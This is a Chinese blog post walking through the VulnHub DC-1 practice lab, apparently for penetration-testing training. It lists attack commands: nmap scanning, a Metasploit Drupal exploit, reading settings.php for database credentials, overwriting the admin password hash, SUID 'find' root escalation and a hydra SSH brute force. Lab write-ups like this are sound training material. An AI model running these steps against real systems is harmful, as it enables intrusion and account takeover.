DC-1通关讲解

已于 2024-09-27 08:59:18 修改
阅读量209 收藏 4
点赞数 7
文章标签: python
于 2024-09-22 00:26:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83565841/article/details/142427277
版权

综合靶场 DC-1

先下载靶场环境

https://www.vulnhub.com/entry/dc-1,292/

进入虚拟机查看IP 

nmap -sP 1 XXX.XXX.XXX.XXX /

nmap -A -p- -v 192.168.132.129

访问web站点

searchsploit  drupal 7

Metersploit 进入msf控制台

search drupa

选择模块测试 Use 1

Shell

执行whoami

进入home 发现flag4.txt

python -c "import pty;pty.spawn('/bin/bash')"

查看www目录找flag4.txt

/var/www/sites/default/settings.php

cat /var/www/sites/default/settings.php

Show databases;

Use drupaldb

select * from users;

Quit;站点路径下执行

php scripts/password-hash.sh+新密码

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";

登录站点账号;admin 密码;123

find / -perm -4000 2>/dev/null

touch 123

ls

find / -name 123 -exec "whoami" \;

find ./ -name 123 -exec "/bin/sh" \;  

whoami

ls

cd /root

ls

cat /etc/passwd

hydra -l flag4 -P password.lst ssh://192.168.132.129

香菜927
关注
DC-1 通关讲解
Ajcssc的博客
09-20 464
典型的drupal,启动Metersploit MSF存在drupal模块,尝试使用msf渗透。发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7。发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS。扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。发现开放了22算口,开放了ssh服务,OpenSSH 6.0p1。输入nmap -A -p- -v 192.168.66.140。
DC-2通关讲解
2401_83565841的博客
09-26 910
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。你还需要获取最后的标志(唯一真正重要的标志!翻译:很高兴看到你走到这一步——但你还没有到家。
DC-1靶机通关
qq_63831588的博客
06-29 1417
DC1靶机,提权,夺旗赛,夺旗,渗透测试,黑盒测试
DC-1 实验通关讲解
2401_83566267的博客
09-19 1130
DC实验讲解
DC-6靶机做题记录
Fab1an的博客
01-21 1318
hosts文件域名解析对WordPress的了解程度,比如后台是wp-admin,还有一个readme.htmlWordPress的扫描器叫wpscan,以及wpscan的用法,可以百度要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式进入后台找寻一个能写php代码的地方,把shell弹回来找到一个插件的漏洞,然后用它来反弹shellnamp提权,用nse脚本提权。
Catf1agCTF-Web通关合集
2401_86436581的博客
09-04 1038
else{}else{echo ‘你输入点东西行不行…’;??}else{echo "你真棒~";???s:3:“age”;s:2:“19”;?cmd=ls?!!
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2680
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-8靶机做题记录
Fab1an的博客
01-23 1007
信息收集很重要,从robots.txt和扫目录的时候获得后台登录的目录对SQL注入的认识要能意识到是否存在SQL注入,还有对SQLmap的使用要熟练密码爆破工具john的用法反弹shell的一句话要熟练还有优化shell的命令最后提权,对漏洞库的用法和搜索要熟练。
靶机渗透练习69-DC1
hirak0的博客
04-21 1233
靶机描述 靶机地址:http://www.vulnhub.com/entry/dc-1,292/ Description DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will
20210118bwapp server inject 全难度通关详解
qq_45290991的博客
02-02 1178
这是HTML 注入的姐妹篇,接着这一篇博客之后来的,要看bwapp 的HTML inject 可以参考这篇博客: 20210113bwapp html inject 全难度通关详解 服务端类型的注入,主要包括bwapp的以下几类(不包括SQL注入,打算单独拿出来写): 那我们就从第一个LDAP注入开始吧! 一、LDAP Connection Settings(LDAP inject) 在此之前我没学过LDAP,是从这几个博客学的入门: https://cloud.tencent.com/dev
《Gpu Gems》《Gpu Pro》《Gpu Zen》系列读书笔记
热门推荐
puppet_master的专栏
02-13 2万+
本篇blog简单记录了一下最近一两年一直在读的一系列书目。《Gpu Gems》1-3三部,《Gpu Pro》1-7七部,《Gpu Zen》一部。针对每一项渲染技术,进行全系列书的总结,从这个角度来看,可以看到一项技术,近十五六年来的进化过程。
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3214
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 688
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
第二百五十四节 JPA教程 - JPA 多对多映射示例
最新发布
2301_78772942的博客
09-27 703
第二百五十四节 JPA教程 - JPA 多对多映射示例
Python精选200Tips:171-175
AnFany
09-26 1290
Python深度学习的项目
python中的深浅拷贝以及总体框架了解
AgostoDu的博客
09-26 1167
1、当b使用copy.deepcopy()深拷贝的时候,可以理解为b不仅外面的整体开辟了一个新的内存地址,b里面包含的列表也开辟了新的内存地址和a里面的内存地址没有任何关系,所以当a修改里面列表元素的值时不会影响b里面列表元素的值。print(mr) #{'name': 'lis', 'age': 18, 'scroe': 100}<br>备注:已经存在的值的优先级>默认值<br>6.3 直接修改 值,显示最新修改值 (修改默认值优先级小于直接添加的字典值)<br>
ubuntu安装libtorch
meng_152634的博客
09-25 752
nouveau是由第三方为NVIDIA显卡开发的一个开源3D驱动,ubuntu默认集成了nouveau驱动,安装NVIDIA驱动前必须禁用系统自带的显卡驱动nouveau,否则安装NVIDIA驱动时会报错。,一定要确定好安装的CUDA版本是否支持显卡的算力,否则安装成功也无法使用GPU加速。如果cmake版本低于3.18,会出现下面的报错,这是由于低于3.18的cmake不支持CUDA17的编译,需要更新cmake版本。因为安装的CUDA版本为12.1,这里选择最新版的CUDNN 9.4.0进行安装。
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值